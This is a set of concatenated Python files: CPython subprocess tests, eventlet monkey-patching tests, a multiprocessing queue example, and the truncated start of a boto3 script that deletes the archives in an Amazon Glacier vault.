def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
executable_list = "exec" # error: must be a sequence
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, [], cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
        # We use hardcoded constants because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
        # Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class CommandTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = set(("list2cmdline",))
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = mkstemp(".py", "te st")
        self.fname = fname.lower()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
            p.stdout.read().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(FileNotFoundError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
CommandTests,
ProcessTestCaseNoPoll,
CommandsWithSpaces,
ContextManagerTests,
RunFuncTestCase,
)
support.run_unittest(*unit_tests)
support.reap_children()
if __name__ == "__main__":
unittest.main()
|
patcher_test.py
|
import os
import shutil
import sys
import tempfile
import six
import tests
base_module_contents = """
import socket
import urllib
print("base {0} {1}".format(socket, urllib))
"""
patching_module_contents = """
from eventlet.green import socket
from eventlet.green import urllib
from eventlet import patcher
print('patcher {0} {1}'.format(socket, urllib))
patcher.inject('base', globals(), ('socket', socket), ('urllib', urllib))
del patcher
"""
import_module_contents = """
import patching
import socket
print("importing {0} {1} {2} {3}".format(patching, socket, patching.socket, patching.urllib))
"""
class ProcessBase(tests.LimitedTestCase):
TEST_TIMEOUT = 3 # starting processes is time-consuming
def setUp(self):
super(ProcessBase, self).setUp()
self._saved_syspath = sys.path
self.tempdir = tempfile.mkdtemp('_patcher_test')
def tearDown(self):
super(ProcessBase, self).tearDown()
sys.path = self._saved_syspath
shutil.rmtree(self.tempdir)
def write_to_tempfile(self, name, contents):
filename = os.path.join(self.tempdir, name)
if not filename.endswith('.py'):
filename = filename + '.py'
with open(filename, "w") as fd:
fd.write(contents)
def launch_subprocess(self, filename):
path = os.path.join(self.tempdir, filename)
output = tests.run_python(path)
if six.PY3:
output = output.decode('utf-8')
separator = '\n'
else:
separator = b'\n'
lines = output.split(separator)
return output, lines
def run_script(self, contents, modname=None):
if modname is None:
modname = "testmod"
self.write_to_tempfile(modname, contents)
return self.launch_subprocess(modname)
class ImportPatched(ProcessBase):
def test_patch_a_module(self):
self.write_to_tempfile("base", base_module_contents)
self.write_to_tempfile("patching", patching_module_contents)
self.write_to_tempfile("importing", import_module_contents)
output, lines = self.launch_subprocess('importing.py')
assert lines[0].startswith('patcher'), repr(output)
assert lines[1].startswith('base'), repr(output)
assert lines[2].startswith('importing'), repr(output)
assert 'eventlet.green.socket' in lines[1], repr(output)
assert 'eventlet.green.urllib' in lines[1], repr(output)
assert 'eventlet.green.socket' in lines[2], repr(output)
assert 'eventlet.green.urllib' in lines[2], repr(output)
assert 'eventlet.green.httplib' not in lines[2], repr(output)
def test_import_patched_defaults():
tests.run_isolated('patcher_import_patched_defaults.py')
def test_import_patched_handles_sub_modules():
tests.run_isolated('test_sub_module_in_import_patched/test.py')
class MonkeyPatch(ProcessBase):
def test_patched_modules(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import socket
try:
import urllib.request as urllib
except ImportError:
import urllib
print("newmod {0} {1}".format(socket.socket, urllib.socket.socket))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[0].startswith('newmod'), repr(output)
self.assertEqual(lines[0].count('GreenSocket'), 2, repr(output))
def test_early_patching(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch()
import eventlet
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_late_patching(self):
new_mod = """
import eventlet
eventlet.sleep(0.01)
from eventlet import patcher
patcher.monkey_patch()
eventlet.sleep(0.01)
print("newmod")
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, repr(output))
assert lines[0].startswith('newmod'), repr(output)
def test_typeerror(self):
new_mod = """
from eventlet import patcher
patcher.monkey_patch(finagle=True)
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
assert lines[-2].startswith('TypeError'), repr(output)
assert 'finagle' in lines[-2], repr(output)
def assert_boolean_logic(self, call, expected, not_expected=''):
expected_list = ", ".join(['"%s"' % x for x in expected.split(',') if len(x)])
not_expected_list = ", ".join(['"%s"' % x for x in not_expected.split(',') if len(x)])
new_mod = """
from eventlet import patcher
%s
for mod in [%s]:
assert patcher.is_monkey_patched(mod), mod
for mod in [%s]:
assert not patcher.is_monkey_patched(mod), mod
print("already_patched {0}".format(",".join(sorted(patcher.already_patched.keys()))))
""" % (call, expected_list, not_expected_list)
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
ap = 'already_patched'
assert lines[0].startswith(ap), repr(output)
patched_modules = lines[0][len(ap):].strip()
# psycopg might or might not be patched based on installed modules
patched_modules = patched_modules.replace("psycopg,", "")
# ditto for MySQLdb
patched_modules = patched_modules.replace("MySQLdb,", "")
self.assertEqual(
patched_modules, expected,
"Logic:%s\nExpected: %s != %s" % (call, expected, patched_modules))
def test_boolean(self):
self.assert_boolean_logic("patcher.monkey_patch()",
'os,select,socket,subprocess,thread,time')
def test_boolean_all(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_single(self):
self.assert_boolean_logic("patcher.monkey_patch(all=True, socket=True)",
'os,select,socket,subprocess,thread,time')
def test_boolean_all_negative(self):
self.assert_boolean_logic(
"patcher.monkey_patch(all=False, socket=False, select=True)",
'select')
def test_boolean_single(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True)",
'socket')
def test_boolean_double(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=True, select=True)",
'select,socket')
def test_boolean_negative(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False)",
'os,select,subprocess,thread,time')
def test_boolean_negative2(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, time=False)",
'os,select,subprocess,thread')
def test_conflicting_specifications(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, select=True)",
'select')
test_monkey_patch_threading = """
def test_monkey_patch_threading():
tickcount = [0]
def tick():
import six
for i in six.moves.range(1000):
tickcount[0] += 1
eventlet.sleep()
def do_sleep():
tpool.execute(time.sleep, 0.5)
eventlet.spawn(tick)
w1 = eventlet.spawn(do_sleep)
w1.wait()
print(tickcount[0])
assert tickcount[0] > 900
tpool.killall()
"""
class Tpool(ProcessBase):
TEST_TIMEOUT = 3
@tests.skip_with_pyevent
def test_simple(self):
new_mod = """
import eventlet
from eventlet import patcher
patcher.monkey_patch()
from eventlet import tpool
print("newmod {0}".format(tpool.execute(len, "hi")))
print("newmod {0}".format(tpool.execute(len, "hi2")))
tpool.killall()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, output)
assert lines[0].startswith('newmod'), repr(output)
assert '2' in lines[0], repr(output)
assert '3' in lines[1], repr(output)
@tests.skip_with_pyevent
def test_unpatched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=False)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, lines)
@tests.skip_with_pyevent
def test_patched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=True)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
def test_subprocess_after_monkey_patch():
code = '''\
import sys
import eventlet
eventlet.monkey_patch()
from eventlet.green import subprocess
subprocess.Popen([sys.executable, '-c', ''], stdin=subprocess.PIPE).wait()
print('pass')
'''
output = tests.run_python(
path=None,
args=['-c', code],
)
assert output.rstrip() == b'pass'
class Threading(ProcessBase):
def test_orig_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import patcher
import threading
_threading = patcher.original('threading')
def test():
print(repr(threading.currentThread()))
t = _threading.Thread(target=test)
t.start()
t.join()
print(len(threading._active))
print(len(_threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 4, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
assert lines[1] == '1', lines
assert lines[2] == '1', lines
def test_tpool(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import tpool
import threading
def test():
print(repr(threading.currentThread()))
tpool.execute(test)
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenlet(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import event
import threading
evt = event.Event()
def test():
print(repr(threading.currentThread()))
evt.send()
eventlet.spawn_n(test)
evt.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_MainThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenthread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
import threading
def test():
print(repr(threading.currentThread()))
t = eventlet.spawn(test)
t.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_keyerror(self):
new_mod = """import eventlet
eventlet.monkey_patch()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 1, "\n".join(lines))
class Os(ProcessBase):
def test_waitpid(self):
new_mod = """import subprocess
import eventlet
eventlet.monkey_patch(all=False, os=True)
process = subprocess.Popen("sleep 0.1 && false", shell=True)
print(process.wait())"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
self.assertEqual('1', lines[0], repr(output))
class GreenThreadWrapper(ProcessBase):
prologue = """import eventlet
eventlet.monkey_patch()
import threading
def test():
t = threading.currentThread()
"""
epilogue = """
t = eventlet.spawn(test)
t.wait()
"""
def test_join(self):
self.write_to_tempfile("newmod", self.prologue + """
def test2():
global t2
t2 = threading.currentThread()
eventlet.spawn(test2)
""" + self.epilogue + """
print(repr(t2))
t2.join()
""")
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
def test_name(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.name)
print(t.getName())
print(t.get_name())
t.name = 'foo'
print(t.name)
print(t.getName())
print(t.get_name())
t.setName('bar')
print(t.name)
print(t.getName())
print(t.get_name())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 10, "\n".join(lines))
for i in range(0, 3):
self.assertEqual(lines[i], "GreenThread-1", lines[i])
for i in range(3, 6):
self.assertEqual(lines[i], "foo", lines[i])
for i in range(6, 9):
self.assertEqual(lines[i], "bar", lines[i])
def test_ident(self):
self.write_to_tempfile("newmod", self.prologue + """
print(id(t._g))
print(t.ident)
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], lines[1])
def test_is_alive(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_alive())
print(t.isAlive())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_is_daemon(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_daemon())
print(t.isDaemon())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_patcher_existing_locks_early():
tests.run_isolated('patcher_existing_locks_early.py')
def test_patcher_existing_locks_late():
tests.run_isolated('patcher_existing_locks_late.py')
def test_patcher_existing_locks_locked():
tests.run_isolated('patcher_existing_locks_locked.py')
@tests.skip_if_CRLock_exist
def test_patcher_existing_locks_unlocked():
tests.run_isolated('patcher_existing_locks_unlocked.py')
def test_importlib_lock():
tests.run_isolated('patcher_importlib_lock.py')
def test_threading_condition():
tests.run_isolated('patcher_threading_condition.py')
def test_threading_join():
tests.run_isolated('patcher_threading_join.py')
def test_socketserver_selectors():
tests.run_isolated('patcher_socketserver_selectors.py')
def test_blocking_select_methods_are_deleted():
tests.run_isolated('patcher_blocking_select_methods_are_deleted.py')
def test_regular_file_readall():
tests.run_isolated('regular_file_readall.py')
def test_threading_current():
tests.run_isolated('patcher_threading_current.py')
def test_threadpoolexecutor():
tests.run_isolated('patcher_threadpoolexecutor.py')
def test_fork_after_monkey_patch():
tests.run_isolated('patcher_fork_after_monkey_patch.py')
def test_builtin():
tests.run_isolated('patcher_builtin.py')
def test_open_kwargs():
tests.run_isolated("patcher_open_kwargs.py")
|
progress_queue.py
|
import time
from multiprocessing import Process
from multiprocessing import Queue
def product(que):
for i in range(10):
que.put(i)
time.sleep(1)
def consume(que):
    time.sleep(1)
    while True:
        data = que.get()
        if data is None:  # sentinel from the producer side: stop consuming
            break
        print(data)
if __name__ == "__main__":
    que = Queue(10)
    p = Process(target=product, args=(que,))
    c = Process(target=consume, args=(que,))
    p.start()
    c.start()
    p.join()
    que.put(None)  # let the consumer exit its loop so c.join() can return
    c.join()
|
removeVault.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import sys
import json
import time
import os
import logging
import boto3
from multiprocessing import Process
from socket import gethostbyname, gaierror
def split_list(alist, wanted_parts=1):
length = len(alist)
return [ alist[i*length // wanted_parts: (i+1)*length // wanted_parts]
for i in range(wanted_parts) ]
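# For example, split_list([1, 2, 3, 4, 5], wanted_parts=2) returns
# [[1, 2], [3, 4, 5]]; the integer-division boundaries keep the part sizes
# within one element of each other.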
def process_archive(archive_list):
logging.info('Starting work on %s items', len(archive_list))
for index, archive in enumerate(archive_list):
if archive['ArchiveId'] != '':
logging.info('%s Remove archive number %s of %s, ID : %s', os.getpid(), index + 1, len(archive_list), archive['ArchiveId'])
try:
glacier.delete_archive(
vaultName=vaultName,
archiveId=archive['ArchiveId']
)
except:
printException()
logging.info('Sleep 2s before retrying...')
time.sleep(2)
logging.info('Retry to remove archive ID : %s', archive['ArchiveId'])
try:
glacier.delete_archive(
vaultName=vaultName,
archiveId=archive['ArchiveId']
)
logging.info('Successfully removed archive ID : %s', archive['ArchiveId'])
except:
logging.error('Cannot remove archive ID : %s', archive['ArchiveId'])
def printException():
exc_type, exc_value = sys.exc_info()[:2]
    logging.error('Exception "%s" occurred with message "%s"', exc_type.__name__, exc_value)
def get_jobs(vaultName):
try:
response = glacier.list_jobs(vaultName=vaultName)
jobs_list = response.get('JobList')
while response.get('Marker') is not None:
response = glacier.list_jobs(vaultName=vaultName, marker=response['Marker'])
jobs_list += response.get('JobList')
return jobs_list
except:
printException()
return []
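# Both get_jobs() above and the vault listing below page through results by
# re-issuing the call with the returned 'Marker' token until none is returned.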
# Default logging config
logging.basicConfig(format='%(asctime)s - %(levelname)s : %(message)s', level=logging.INFO, datefmt='%H:%M:%S')
# Get arguments
if len(sys.argv) >= 3:
regionName = sys.argv[1]
vaultName = sys.argv[2]
numProcess = 1
retrievalJob = 'LATEST'
else:
# If there are missing arguments, display usage example and exit
logging.error('Usage: %s <region_name> [<vault_name>|LIST] [DEBUG] [NUMPROCESS] [<job_id>|LIST|NEW|LATEST]', sys.argv[0])
sys.exit(1)
# 3rd argument - log level, num process or job ID
if len(sys.argv) >= 4:
if sys.argv[3] == 'DEBUG':
logging.info('Logging level set to DEBUG.')
logging.getLogger().setLevel(logging.DEBUG)
elif sys.argv[3].isdigit():
numProcess = int(sys.argv[3])
else:
retrievalJob = sys.argv[3]
# 4th argument - num process or job ID
if len(sys.argv) >= 5:
if sys.argv[4].isdigit():
numProcess = int(sys.argv[4])
else:
retrievalJob = sys.argv[4]
logging.info('Running with %s processes', numProcess)
# 5th argument - job ID
if len(sys.argv) >= 6:
retrievalJob = sys.argv[5]
os.environ['AWS_DEFAULT_REGION'] = regionName
# Load credentials
try:
f = open('credentials.json', 'r')
config = json.loads(f.read())
f.close()
os.environ['AWS_ACCESS_KEY_ID'] = config['AWSAccessKeyId']
os.environ['AWS_SECRET_ACCESS_KEY'] = config['AWSSecretKey']
except:
logging.error('Cannot load "credentials.json" file... Assuming Role Authentication.')
sts_client = boto3.client("sts")
accountId = sts_client.get_caller_identity()["Account"]
logging.info("Working on AccountID: {id}".format(id=accountId))
try:
logging.info('Connecting to Amazon Glacier...')
glacier = boto3.client('glacier')
except:
printException()
sys.exit(1)
if vaultName == 'LIST':
try:
logging.info('Getting list of vaults...')
response = glacier.list_vaults()
vault_list = response.get('VaultList')
while response.get('Marker') is not None:
response = glacier.list_vaults(marker=response['Marker'])
vault_list += response.get('VaultList')
except:
printException()
sys.exit(1)
for vault in vault_list:
logging.info(vault['VaultName'])
exit(0)
if retrievalJob == 'LIST':
logging.info('Getting list of inventory retrieval jobs...')
jobs_list = get_jobs(vaultName)
for job in jobs_list:
if job['Action'] == 'InventoryRetrieval':
logging.info("{id} - {date} - {status}".format(id=job['JobId'], date=job['CreationDate'], status=job['StatusCode']))
exit(0)
try:
logging.info('Getting selected vault... [{v}]'.format(v=vaultName))
vault = glacier.describe_vault(vaultName=vaultName)
logging.info("Working on ARN {arn}".format(arn=vault['VaultARN']))
except:
printException()
sys.exit(1)
if retrievalJob == 'LATEST':
logging.info('Looking for the latest inventory retrieval job...')
jobs_list = get_jobs(vaultName) # Reversed to get the latest, not the first
retrievalJob = ''
# Check if a job already exists
for job in jobs_list:
if job['Action'] == 'InventoryRetrieval':
logging.info('Found existing job...')
retrievalJob = job['JobId']
break
if retrievalJob == '':
logging.info('No existing job found...')
if retrievalJob == '' or retrievalJob == 'NEW':
logging.info('Initiate inventory retrieval...')
try:
